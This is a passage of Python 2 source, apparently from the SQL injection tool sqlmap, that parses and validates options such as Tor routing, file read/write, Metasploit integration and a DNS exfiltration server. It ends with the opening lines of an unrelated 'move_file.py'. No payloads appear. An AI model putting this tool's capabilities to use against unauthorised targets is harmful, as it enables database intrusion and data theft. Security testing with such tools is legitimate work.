conf.rParam = re.split(PARAMETER_SPLITTING_REGEX, conf.rParam)
else:
conf.rParam = []
if conf.paramDel and '\\' in conf.paramDel:
try:
conf.paramDel = conf.paramDel.decode("string_escape")
except ValueError:
pass
if conf.skip:
conf.skip = conf.skip.replace(" ", "")
conf.skip = re.split(PARAMETER_SPLITTING_REGEX, conf.skip)
else:
conf.skip = []
if conf.cookie:
conf.cookie = re.sub(r"[\r\n]", "", conf.cookie)
if conf.delay:
conf.delay = float(conf.delay)
if conf.url:
conf.url = conf.url.strip()
if not re.search(r"\A\w+://", conf.url):
conf.url = "http://%s" % conf.url
if conf.fileRead:
conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead))
if conf.fileWrite:
conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite))
if conf.fileDest:
conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest))
if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"):
conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl)
if conf.msfPath:
conf.msfPath = ntToPosixSlashes(normalizePath(conf.msfPath))
if conf.tmpPath:
conf.tmpPath = ntToPosixSlashes(normalizePath(conf.tmpPath))
if any((conf.googleDork, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.forms, conf.crawlDepth)):
conf.multipleTargets = True
if conf.optimize:
setOptimize()
if conf.os:
conf.os = conf.os.capitalize()
if conf.forceDbms:
conf.dbms = conf.forceDbms
if conf.dbms:
kb.dbmsFilter = []
for _ in conf.dbms.split(','):
for dbms, aliases in DBMS_ALIASES:
if _.strip().lower() in aliases:
kb.dbmsFilter.append(dbms)
conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
break
if conf.testFilter:
conf.testFilter = conf.testFilter.strip('*+')
conf.testFilter = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testFilter)
try:
re.compile(conf.testFilter)
except re.error:
conf.testFilter = re.escape(conf.testFilter)
if conf.csrfToken:
original = conf.csrfToken
try:
re.compile(conf.csrfToken)
if re.escape(conf.csrfToken) != conf.csrfToken:
message = "provided value for option '--csrf-token' is a regular expression? [Y/n] "
if not readInput(message, default='Y', boolean=True):
conf.csrfToken = re.escape(conf.csrfToken)
except re.error:
conf.csrfToken = re.escape(conf.csrfToken)
finally:
class _(unicode):
pass
conf.csrfToken = _(conf.csrfToken)
conf.csrfToken._original = original
if conf.testSkip:
conf.testSkip = conf.testSkip.strip('*+')
conf.testSkip = re.sub(r"([^.])([*+])", r"\g<1>.\g<2>", conf.testSkip)
try:
re.compile(conf.testSkip)
except re.error:
conf.testSkip = re.escape(conf.testSkip)
if "timeSec" not in kb.explicitSettings:
if conf.tor:
conf.timeSec = 2 * conf.timeSec
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
warnMsg = "increasing default value for "
warnMsg += "option '--time-sec' to %d because " % conf.timeSec
warnMsg += "switch '--tor' was provided"
logger.warn(warnMsg)
else:
kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE
if conf.retries:
conf.retries = min(conf.retries, MAX_CONNECT_RETRIES)
if conf.code:
conf.code = int(conf.code)
if conf.csvDel:
conf.csvDel = conf.csvDel.decode("string_escape") # e.g. '\\t' -> '\t'
if conf.torPort and isinstance(conf.torPort, basestring) and conf.torPort.isdigit():
conf.torPort = int(conf.torPort)
if conf.torType:
conf.torType = conf.torType.upper()
if conf.outputDir:
paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir))
setPaths(paths.SQLMAP_ROOT_PATH)
if conf.string:
try:
conf.string = conf.string.decode("unicode_escape")
except:
charset = string.whitespace.replace(" ", "")
for _ in charset:
conf.string = conf.string.replace(_.encode("string_escape"), _)
if conf.getAll:
map(lambda _: conf.__setitem__(_, True), WIZARD.ALL)
if conf.noCast:
for _ in list(DUMP_REPLACEMENTS.keys()):
del DUMP_REPLACEMENTS[_]
if conf.dumpFormat:
conf.dumpFormat = conf.dumpFormat.upper()
if conf.torType:
conf.torType = conf.torType.upper()
if conf.col:
conf.col = re.sub(r"\s*,\s*", ',', conf.col)
if conf.exclude:
conf.exclude = re.sub(r"\s*,\s*", ',', conf.exclude)
if conf.binaryFields:
conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields)
if any((conf.proxy, conf.proxyFile, conf.tor)):
conf.disablePrecon = True
if conf.dummy:
conf.batch = True
threadData = getCurrentThreadData()
threadData.reset()
def _cleanupEnvironment():
"""
Cleanup environment (e.g. from leftovers after --sqlmap-shell).
"""
if issubclass(urllib2.socket.socket, socks.socksocket):
socks.unwrapmodule(urllib2)
if hasattr(socket, "_ready"):
socket._ready.clear()
def _purge():
"""
Safely removes (purges) sqlmap data directory.
"""
if conf.purge:
purge(paths.SQLMAP_HOME_PATH)
def _setConfAttributes():
"""
This function set some needed attributes into the configuration
singleton.
"""
debugMsg = "initializing the configuration"
logger.debug(debugMsg)
conf.authUsername = None
conf.authPassword = None
conf.boundaries = []
conf.cj = None
conf.dbmsConnector = None
conf.dbmsHandler = None
conf.dnsServer = None
conf.dumpPath = None
conf.hashDB = None
conf.hashDBFile = None
conf.httpCollector = None
conf.httpHeaders = []
conf.hostname = None
conf.ipv6 = False
conf.multipleTargets = False
conf.outputPath = None
conf.paramDict = {}
conf.parameters = {}
conf.path = None
conf.port = None
conf.proxyList = None
conf.resultsFilename = None
conf.resultsFP = None
conf.scheme = None
conf.tests = []
conf.trafficFP = None
conf.HARCollectorFactory = None
conf.fileWriteType = None
def _setKnowledgeBaseAttributes(flushAll=True):
"""
This function set some needed attributes into the knowledge base
singleton.
"""
debugMsg = "initializing the knowledge base"
logger.debug(debugMsg)
kb.absFilePaths = set()
kb.adjustTimeDelay = None
kb.alerted = False
kb.aliasName = randomStr()
kb.alwaysRefresh = None
kb.arch = None
kb.authHeader = None
kb.bannerFp = AttribDict()
kb.binaryField = False
kb.browserVerification = None
kb.brute = AttribDict({"tables": [], "columns": []})
kb.bruteMode = False
kb.cache = AttribDict()
kb.cache.addrinfo = {}
kb.cache.content = {}
kb.cache.encoding = {}
kb.cache.alphaBoundaries = None
kb.cache.intBoundaries = None
kb.cache.parsedDbms = {}
kb.cache.regex = {}
kb.cache.stdev = {}
kb.captchaDetected = None
kb.chars = AttribDict()
kb.chars.delimiter = randomStr(length=6, lowercase=True)
kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
kb.chars.stop = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR)
kb.chars.at, kb.chars.space, kb.chars.dollar, kb.chars.hash_ = ("%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, _, KB_CHARS_BOUNDARY_CHAR) for _ in randomStr(length=4, lowercase=True))
kb.columnExistsChoice = None
kb.commonOutputs = None
kb.connErrorChoice = None
kb.connErrorCounter = 0
kb.cookieEncodeChoice = None
kb.counters = {}
kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR
kb.data = AttribDict()
kb.dataOutputFlag = False
# Active back-end DBMS fingerprint
kb.dbms = None
kb.dbmsFilter = []
kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]
kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
kb.dep = None
kb.dnsMode = False
kb.dnsTest = None
kb.docRoot = None
kb.droppingRequests = False
kb.dumpColumns = None
kb.dumpTable = None
kb.dumpKeyboardInterrupt = False
kb.dynamicMarkings = []
kb.dynamicParameter = False
kb.endDetection = False
kb.explicitSettings = set()
kb.extendTests = None
kb.errorChunkLength = None
kb.errorIsNone = True
kb.falsePositives = []
kb.fileReadMode = False
kb.followSitemapRecursion = None
kb.forcedDbms = None
kb.forcePartialUnion = False
kb.forceWhere = None
kb.futileUnion = None
kb.heavilyDynamic = False
kb.headersFp = {}
kb.heuristicDbms = None
kb.heuristicExtendedDbms = None
kb.heuristicMode = False
kb.heuristicPage = False
kb.heuristicTest = None
kb.hintValue = None
kb.htmlFp = []
kb.httpErrorCodes = {}
kb.inferenceMode = False
kb.ignoreCasted = None
kb.ignoreNotFound = False
kb.ignoreTimeout = False
kb.injection = InjectionDict()
kb.injections = []
kb.laggingChecked = False
kb.lastParserStatus = None
kb.locks = AttribDict()
for _ in ("cache", "connError", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"):
kb.locks[_] = threading.Lock()
kb.matchRatio = None
kb.maxConnectionsFlag = False
kb.mergeCookies = None
kb.negativeLogic = False
kb.nullConnection = None
kb.oldMsf = None
kb.orderByColumns = None
kb.originalCode = None
kb.originalPage = None
kb.originalPageTime = None
kb.originalTimeDelay = None
kb.originalUrls = dict()
# Back-end DBMS underlying operating system fingerprint via banner (-b)
# parsing
kb.os = None
kb.osVersion = None
kb.osSP = None
kb.pageCompress = True
kb.pageTemplate = None
kb.pageTemplates = dict()
kb.pageEncoding = DEFAULT_PAGE_ENCODING
kb.pageStable = None
kb.partRun = None
kb.permissionFlag = False
kb.postHint = None
kb.postSpaceToPlus = False
kb.postUrlEncode = True
kb.prependFlag = False
kb.processResponseCounter = 0
kb.previousMethod = None
kb.processUserMarks = None
kb.proxyAuthHeader = None
kb.queryCounter = 0
kb.redirectChoice = None
kb.reflectiveMechanism = True
kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0}
kb.requestCounter = 0
kb.resendPostOnRedirect = None
kb.resolutionDbms = None
kb.responseTimes = {}
kb.responseTimeMode = None
kb.responseTimePayload = None
kb.resumeValues = True
kb.rowXmlMode = False
kb.safeCharEncode = False
kb.safeReq = AttribDict()
kb.secondReq = None
kb.serverHeader = None
kb.singleLogFlags = set()
kb.skipSeqMatcher = False
kb.reduceTests = None
kb.tlsSNI = {}
kb.stickyDBMS = False
kb.stickyLevel = None
kb.storeCrawlingChoice = None
kb.storeHashesChoice = None
kb.suppressResumeInfo = False
kb.tableFrom = None
kb.technique = None
kb.tempDir = None
kb.testMode = False
kb.testOnlyCustom = False
kb.testQueryCount = 0
kb.testType = None
kb.threadContinue = True
kb.threadException = False
kb.tableExistsChoice = None
kb.uChar = NULL
kb.unionDuplicates = False
kb.wafSpecificResponse = None
kb.wizardMode = False
kb.xpCmdshellAvailable = False
if flushAll:
kb.headerPaths = {}
kb.keywords = set(getFileItems(paths.SQL_KEYWORDS))
kb.passwordMgr = None
kb.skipVulnHost = None
kb.tamperFunctions = []
kb.targets = oset()
kb.testedParams = set()
kb.userAgents = None
kb.vainRun = True
kb.vulnHosts = set()
kb.wafFunctions = []
kb.wordlists = None
def _useWizardInterface():
"""
Presents simple wizard interface for beginner users
"""
if not conf.wizard:
return
logger.info("starting wizard interface")
while not conf.url:
message = "Please enter full target URL (-u): "
conf.url = readInput(message, default=None)
message = "%s data (--data) [Enter for None]: " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
conf.data = readInput(message, default=None)
if not (filter(lambda _: '=' in unicode(_), (conf.url, conf.data)) or '*' in conf.url):
warnMsg = "no GET and/or %s parameter(s) found for testing " % ((conf.method if conf.method != HTTPMETHOD.GET else conf.method) or HTTPMETHOD.POST)
warnMsg += "(e.g. GET parameter 'id' in 'http://www.site.com/vuln.php?id=1'). "
if not conf.crawlDepth and not conf.forms:
warnMsg += "Will search for forms"
conf.forms = True
logger.warn(warnMsg)
choice = None
while choice is None or choice not in ("", "1", "2", "3"):
message = "Injection difficulty (--level/--risk). Please choose:\n"
message += "[1] Normal (default)\n[2] Medium\n[3] Hard"
choice = readInput(message, default='1')
if choice == '2':
conf.risk = 2
conf.level = 3
elif choice == '3':
conf.risk = 3
conf.level = 5
else:
conf.risk = 1
conf.level = 1
if not conf.getAll:
choice = None
while choice is None or choice not in ("", "1", "2", "3"):
message = "Enumeration (--banner/--current-user/etc). Please choose:\n"
message += "[1] Basic (default)\n[2] Intermediate\n[3] All"
choice = readInput(message, default='1')
if choice == '2':
map(lambda _: conf.__setitem__(_, True), WIZARD.INTERMEDIATE)
elif choice == '3':
map(lambda _: conf.__setitem__(_, True), WIZARD.ALL)
else:
map(lambda _: conf.__setitem__(_, True), WIZARD.BASIC)
logger.debug("muting sqlmap.. it will do the magic for you")
conf.verbose = 0
conf.batch = True
conf.threads = 4
dataToStdout("\nsqlmap is running, please wait..\n\n")
kb.wizardMode = True
def _saveConfig():
"""
Saves the command line options to a sqlmap configuration INI file
Format.
"""
if not conf.saveConfig:
return
debugMsg = "saving command line options to a sqlmap configuration INI file"
logger.debug(debugMsg)
saveConfig(conf, conf.saveConfig)
infoMsg = "saved command line options to the configuration file '%s'" % conf.saveConfig
logger.info(infoMsg)
def setVerbosity():
"""
This function set the verbosity of sqlmap output messages.
"""
if conf.verbose is None:
conf.verbose = 1
conf.verbose = int(conf.verbose)
if conf.verbose == 0:
logger.setLevel(logging.ERROR)
elif conf.verbose == 1:
logger.setLevel(logging.INFO)
elif conf.verbose > 2 and conf.eta:
conf.verbose = 2
logger.setLevel(logging.DEBUG)
elif conf.verbose == 2:
logger.setLevel(logging.DEBUG)
elif conf.verbose == 3:
logger.setLevel(CUSTOM_LOGGING.PAYLOAD)
elif conf.verbose == 4:
logger.setLevel(CUSTOM_LOGGING.TRAFFIC_OUT)
elif conf.verbose >= 5:
logger.setLevel(CUSTOM_LOGGING.TRAFFIC_IN)
def _normalizeOptions(inputOptions):
"""
Sets proper option types
"""
types_ = {}
for group in optDict.keys():
types_.update(optDict[group])
for key in inputOptions:
if key in types_:
value = inputOptions[key]
if value is None:
continue
type_ = types_[key]
if type_ and isinstance(type_, tuple):
type_ = type_[0]
if type_ == OPTION_TYPE.BOOLEAN:
try:
value = bool(value)
except (TypeError, ValueError):
value = False
elif type_ == OPTION_TYPE.INTEGER:
try:
value = int(value)
except (TypeError, ValueError):
value = 0
elif type_ == OPTION_TYPE.FLOAT:
try:
value = float(value)
except (TypeError, ValueError):
value = 0.0
inputOptions[key] = value
def _mergeOptions(inputOptions, overrideOptions):
"""
Merge command line options with configuration file and default options.
@param inputOptions: optparse object with command line options.
@type inputOptions: C{instance}
"""
if inputOptions.configFile:
configFileParser(inputOptions.configFile)
if hasattr(inputOptions, "items"):
inputOptionsItems = inputOptions.items()
else:
inputOptionsItems = inputOptions.__dict__.items()
for key, value in inputOptionsItems:
if key not in conf or value not in (None, False) or overrideOptions:
conf[key] = value
if not conf.api:
for key, value in conf.items():
if value is not None:
kb.explicitSettings.add(key)
for key, value in defaults.items():
if hasattr(conf, key) and conf[key] is None:
conf[key] = value
lut = {}
for group in optDict.keys():
lut.update((_.upper(), _) for _ in optDict[group])
envOptions = {}
for key, value in os.environ.items():
if key.upper().startswith(SQLMAP_ENVIRONMENT_PREFIX):
_ = key[len(SQLMAP_ENVIRONMENT_PREFIX):].upper()
if _ in lut:
envOptions[lut[_]] = value
if envOptions:
_normalizeOptions(envOptions)
for key, value in envOptions.items():
conf[key] = value
mergedOptions.update(conf)
def _setTrafficOutputFP():
if conf.trafficFile:
infoMsg = "setting file for logging HTTP traffic"
logger.info(infoMsg)
conf.trafficFP = openFile(conf.trafficFile, "w+")
def _setupHTTPCollector():
if not conf.harFile:
return
conf.httpCollector = HTTPCollectorFactory(conf.harFile).create()
def _setDNSServer():
if not conf.dnsDomain:
return
infoMsg = "setting up DNS server instance"
logger.info(infoMsg)
isAdmin = runningAsAdmin()
if isAdmin:
try:
conf.dnsServer = DNSServer()
conf.dnsServer.run()
except socket.error as ex:
errMsg = "there was an error while setting up "
errMsg += "DNS server instance ('%s')" % getSafeExString(ex)
raise SqlmapGenericException(errMsg)
else:
errMsg = "you need to run sqlmap as an administrator "
errMsg += "if you want to perform a DNS data exfiltration attack "
errMsg += "as it will need to listen on privileged UDP port 53 "
errMsg += "for incoming address resolution attempts"
raise SqlmapMissingPrivileges(errMsg)
def _setProxyList():
if not conf.proxyFile:
return
conf.proxyList = []
for match in re.finditer(r"(?i)((http[^:]*|socks[^:]*)://)?([\w\-.]+):(\d+)", readCachedFileContent(conf.proxyFile)):
_, type_, address, port = match.groups()
conf.proxyList.append("%s://%s:%s" % (type_ or "http", address, port))
def _setTorProxySettings():
if not conf.tor:
return
if conf.torType == PROXY_TYPE.HTTP:
_setTorHttpProxySettings()
else:
_setTorSocksProxySettings()
def _setTorHttpProxySettings():
infoMsg = "setting Tor HTTP proxy settings"
logger.info(infoMsg)
port = findLocalPort(DEFAULT_TOR_HTTP_PORTS if not conf.torPort else (conf.torPort,))
if port:
conf.proxy = "http://%s:%d" % (LOCALHOST, port)
else:
errMsg = "can't establish connection with the Tor HTTP proxy. "
errMsg += "Please make sure that you have Tor (bundle) installed and setup "
errMsg += "so you could be able to successfully use switch '--tor' "
raise SqlmapConnectionException(errMsg)
if not conf.checkTor:
warnMsg = "use switch '--check-tor' at "
warnMsg += "your own convenience when accessing "
warnMsg += "Tor anonymizing network because of "
warnMsg += "known issues with default settings of various 'bundles' "
warnMsg += "(e.g. Vidalia)"
logger.warn(warnMsg)
def _setTorSocksProxySettings():
infoMsg = "setting Tor SOCKS proxy settings"
logger.info(infoMsg)
port = findLocalPort(DEFAULT_TOR_SOCKS_PORTS if not conf.torPort else (conf.torPort,))
if not port:
errMsg = "can't establish connection with the Tor SOCKS proxy. "
errMsg += "Please make sure that you have Tor service installed and setup "
errMsg += "so you could be able to successfully use switch '--tor' "
raise SqlmapConnectionException(errMsg)
# SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if conf.torType == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, LOCALHOST, port)
socks.wrapmodule(urllib2)
def _checkWebSocket():
if conf.url and (conf.url.startswith("ws:/") or conf.url.startswith("wss:/")):
try:
from websocket import ABNF
except ImportError:
errMsg = "sqlmap requires third-party module 'websocket-client' "
errMsg += "in order to use WebSocket functionality"
raise SqlmapMissingDependence(errMsg)
def _checkTor():
if not conf.checkTor:
return
infoMsg = "checking Tor connection"
logger.info(infoMsg)
try:
page, _, _ = Request.getPage(url="https://check.torproject.org/", raise404=False)
except SqlmapConnectionException:
page = None
if not page or 'Congratulations' not in page:
errMsg = "it appears that Tor is not properly set. Please try using options '--tor-type' and/or '--tor-port'"
raise SqlmapConnectionException(errMsg)
else:
infoMsg = "Tor is properly being used"
logger.info(infoMsg)
def _basicOptionValidation():
if conf.limitStart is not None and not (isinstance(conf.limitStart, int) and conf.limitStart > 0):
errMsg = "value for option '--start' (limitStart) must be an integer value greater than zero (>0)"
raise SqlmapSyntaxException(errMsg)
if conf.limitStop is not None and not (isinstance(conf.limitStop, int) and conf.limitStop > 0):
errMsg = "value for option '--stop' (limitStop) must be an integer value greater than zero (>0)"
raise SqlmapSyntaxException(errMsg)
if conf.level is not None and not (isinstance(conf.level, int) and conf.level >= 1 and conf.level <= 5):
errMsg = "value for option '--level' must be an integer value from range [1, 5]"
raise SqlmapSyntaxException(errMsg)
if conf.risk is not None and not (isinstance(conf.risk, int) and conf.risk >= 1 and conf.risk <= 3):
errMsg = "value for option '--risk' must be an integer value from range [1, 3]"
raise SqlmapSyntaxException(errMsg)
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable"
logger.warn(warnMsg)
if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
raise SqlmapSyntaxException(errMsg)
if conf.textOnly and conf.nullConnection:
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.eta and conf.verbose > defaults.verbose:
errMsg = "switch '--eta' is incompatible with option '-v'"
raise SqlmapSyntaxException(errMsg)
if conf.secondUrl and conf.secondReq:
errMsg = "option '--second-url' is incompatible with option '--second-req')"
raise SqlmapSyntaxException(errMsg)
if conf.direct and conf.url:
errMsg = "option '-d' is incompatible with option '-u' ('--url')"
raise SqlmapSyntaxException(errMsg)
if conf.direct and conf.dbms:
errMsg = "option '-d' is incompatible with option '--dbms'"
raise SqlmapSyntaxException(errMsg)
if conf.identifyWaf and conf.skipWaf:
errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'"
raise SqlmapSyntaxException(errMsg)
if conf.titles and conf.nullConnection:
errMsg = "switch '--titles' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.dumpTable and conf.search:
errMsg = "switch '--dump' is incompatible with switch '--search'"
raise SqlmapSyntaxException(errMsg)
if conf.api and not conf.configFile:
errMsg = "switch '--api' requires usage of option '-c'"
raise SqlmapSyntaxException(errMsg)
if conf.data and conf.nullConnection:
errMsg = "option '--data' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.string and conf.nullConnection:
errMsg = "option '--string' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.notString and conf.nullConnection:
errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.tor and conf.osPwn:
errMsg = "option '--tor' is incompatible with switch '--os-pwn'"
raise SqlmapSyntaxException(errMsg)
if conf.noCast and conf.hexConvert:
errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
raise SqlmapSyntaxException(errMsg)
if conf.dumpAll and conf.search:
errMsg = "switch '--dump-all' is incompatible with switch '--search'"
raise SqlmapSyntaxException(errMsg)
if conf.string and conf.notString:
errMsg = "option '--string' is incompatible with switch '--not-string'"
raise SqlmapSyntaxException(errMsg)
if conf.regexp and conf.nullConnection:
errMsg = "option '--regexp' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
if conf.regexp:
try:
re.compile(conf.regexp)
except Exception as ex:
errMsg = "invalid regular expression '%s' ('%s')" % (conf.regexp, getSafeExString(ex))
raise SqlmapSyntaxException(errMsg)
if conf.crawlExclude:
try:
re.compile(conf.crawlExclude)
except Exception as ex:
errMsg = "invalid regular expression '%s' ('%s')" % (conf.crawlExclude, getSafeExString(ex))
raise SqlmapSyntaxException(errMsg)
if conf.dumpTable and conf.dumpAll:
errMsg = "switch '--dump' is incompatible with switch '--dump-all'"
raise SqlmapSyntaxException(errMsg)
if conf.predictOutput and (conf.threads > 1 or conf.optimize):
errMsg = "switch '--predict-output' is incompatible with option '--threads' and switch '-o'"
raise SqlmapSyntaxException(errMsg)
if conf.threads > MAX_NUMBER_OF_THREADS and not conf.get("skipThreadCheck"):
errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS
raise SqlmapSyntaxException(errMsg)
if conf.forms and not any((conf.url, conf.googleDork, conf.bulkFile, conf.sitemapUrl)):
errMsg = "switch '--forms' requires usage of option '-u' ('--url'), '-g', '-m' or '-x'"
raise SqlmapSyntaxException(errMsg)
if conf.crawlExclude and not conf.crawlDepth:
errMsg = "option '--crawl-exclude' requires usage of switch '--crawl'"
raise SqlmapSyntaxException(errMsg)
if conf.safePost and not conf.safeUrl:
errMsg = "option '--safe-post' requires usage of option '--safe-url'"
raise SqlmapSyntaxException(errMsg)
if conf.safeFreq and not any((conf.safeUrl, conf.safeReqFile)):
errMsg = "option '--safe-freq' requires usage of option '--safe-url' or '--safe-req'"
raise SqlmapSyntaxException(errMsg)
if conf.safeReqFile and any((conf.safeUrl, conf.safePost)):
errMsg = "option '--safe-req' is incompatible with option '--safe-url' and option '--safe-post'"
raise SqlmapSyntaxException(errMsg)
if conf.csrfUrl and not conf.csrfToken:
errMsg = "option '--csrf-url' requires usage of option '--csrf-token'"
raise SqlmapSyntaxException(errMsg)
if conf.csrfToken and conf.threads > 1:
errMsg = "option '--csrf-url' is incompatible with option '--threads'"
raise SqlmapSyntaxException(errMsg)
if conf.requestFile and conf.url and conf.url != DUMMY_URL:
errMsg = "option '-r' is incompatible with option '-u' ('--url')"
raise SqlmapSyntaxException(errMsg)
if conf.direct and conf.proxy:
errMsg = "option '-d' is incompatible with option '--proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.direct and conf.tor:
errMsg = "option '-d' is incompatible with switch '--tor'"
raise SqlmapSyntaxException(errMsg)
if not conf.tech:
errMsg = "option '--technique' can't be empty"
raise SqlmapSyntaxException(errMsg)
if conf.tor and conf.ignoreProxy:
errMsg = "switch '--tor' is incompatible with switch '--ignore-proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.tor and conf.proxy:
errMsg = "switch '--tor' is incompatible with option '--proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.proxy and conf.proxyFile:
errMsg = "switch '--proxy' is incompatible with option '--proxy-file'"
raise SqlmapSyntaxException(errMsg)
if conf.checkTor and not any((conf.tor, conf.proxy)):
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)"
raise SqlmapSyntaxException(errMsg)
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
errMsg = "value for option '--tor-port' must be in range [0, 65535]"
raise SqlmapSyntaxException(errMsg)
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
errMsg = "option '--tor-type' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(PROXY_TYPE, True))
raise SqlmapSyntaxException(errMsg)
if conf.dumpFormat not in getPublicTypeMembers(DUMP_FORMAT, True):
errMsg = "option '--dump-format' accepts one of following values: %s" % ", ".join(getPublicTypeMembers(DUMP_FORMAT, True))
raise SqlmapSyntaxException(errMsg)
if conf.skip and conf.testParameter:
errMsg = "option '--skip' is incompatible with option '-p'"
raise SqlmapSyntaxException(errMsg)
if conf.mobile and conf.agent:
errMsg = "switch '--mobile' is incompatible with option '--user-agent'"
raise SqlmapSyntaxException(errMsg)
if conf.proxy and conf.ignoreProxy:
errMsg = "option '--proxy' is incompatible with switch '--ignore-proxy'"
raise SqlmapSyntaxException(errMsg)
if conf.timeSec < 1:
errMsg = "value for option '--time-sec' must be a positive integer"
raise SqlmapSyntaxException(errMsg)
if conf.uChar and not re.match(UNION_CHAR_REGEX, conf.uChar):
errMsg = "value for option '--union-char' must be an alpha-numeric value (e.g. 1)"
raise SqlmapSyntaxException(errMsg)
if conf.hashFile and any((conf.direct, conf.url, conf.logFile, conf.bulkFile, conf.googleDork, conf.configFile, conf.requestFile, conf.updateAll, conf.smokeTest, conf.liveTest, conf.wizard, conf.dependencies, conf.purge, conf.sitemapUrl, conf.listTampers)):
errMsg = "option '--crack' should be used as a standalone"
raise SqlmapSyntaxException(errMsg)
if isinstance(conf.uCols, basestring):
if not conf.uCols.isdigit() and ("-" not in conf.uCols or len(conf.uCols.split("-")) != 2):
errMsg = "value for option '--union-cols' must be a range with hyphon "
errMsg += "(e.g. 1-10) or integer value (e.g. 5)"
raise SqlmapSyntaxException(errMsg)
if conf.dbmsCred and ':' not in conf.dbmsCred:
errMsg = "value for option '--dbms-cred' must be in "
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
raise SqlmapSyntaxException(errMsg)
if conf.encoding:
_ = checkCharEncoding(conf.encoding, False)
if _ is None:
errMsg = "unknown encoding '%s'. Please visit " % conf.encoding
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
errMsg += "supported encodings"
raise SqlmapSyntaxException(errMsg)
else:
conf.encoding = _
if conf.loadCookies:
if not os.path.exists(conf.loadCookies):
errMsg = "cookies file '%s' does not exist" % conf.loadCookies
raise SqlmapFilePathException(errMsg)
def _resolveCrossReferences():
lib.core.threads.readInput = readInput
lib.core.common.getPageTemplate = getPageTemplate
lib.core.convert.singleTimeWarnMessage = singleTimeWarnMessage
lib.request.connect.setHTTPHandlers = _setHTTPHandlers
lib.utils.search.setHTTPHandlers = _setHTTPHandlers
lib.controller.checks.setVerbosity = setVerbosity
lib.controller.checks.setWafFunctions = _setWafFunctions
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
_setConfAttributes()
_setKnowledgeBaseAttributes()
_mergeOptions(inputOptions, overrideOptions)
def init():
"""
Set attributes into both configuration and knowledge base singletons
based upon command line and configuration file options.
"""
_useWizardInterface()
setVerbosity()
_saveConfig()
_setRequestFromFile()
_cleanupOptions()
_cleanupEnvironment()
_purge()
_checkDependencies()
_createTemporaryDirectory()
_basicOptionValidation()
_setProxyList()
_setTorProxySettings()
_setDNSServer()
_adjustLoggingFormatter()
_setMultipleTargets()
_listTamperingFunctions()
_setTamperingFunctions()
_setWafFunctions()
_setTrafficOutputFP()
_setupHTTPCollector()
_resolveCrossReferences()
_checkWebSocket()
parseTargetDirect()
if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)):
_setHostname()
_setHTTPTimeout()
_setHTTPExtraHeaders()
_setHTTPCookies()
_setHTTPReferer()
_setHTTPHost()
_setHTTPUserAgent()
_setHTTPAuthentication()
_setHTTPHandlers()
_setDNSCache()
_setSocketPreConnect()
_setSafeVisit()
_doSearch()
_setBulkMultipleTargets()
_setSitemapTargets()
_checkTor()
_setCrawler()
_findPageForms()
_setDBMS()
_setTechnique()
_setThreads()
_setOS()
_setWriteFile()
_setMetasploit()
_setDBMSAuthentication()
loadBoundaries()
loadPayloads()
_setPrefixSuffix()
update()
_loadQueries()
|
move_file.py | #!/usr/bin/env python2
# coding: utf-8
import argparse
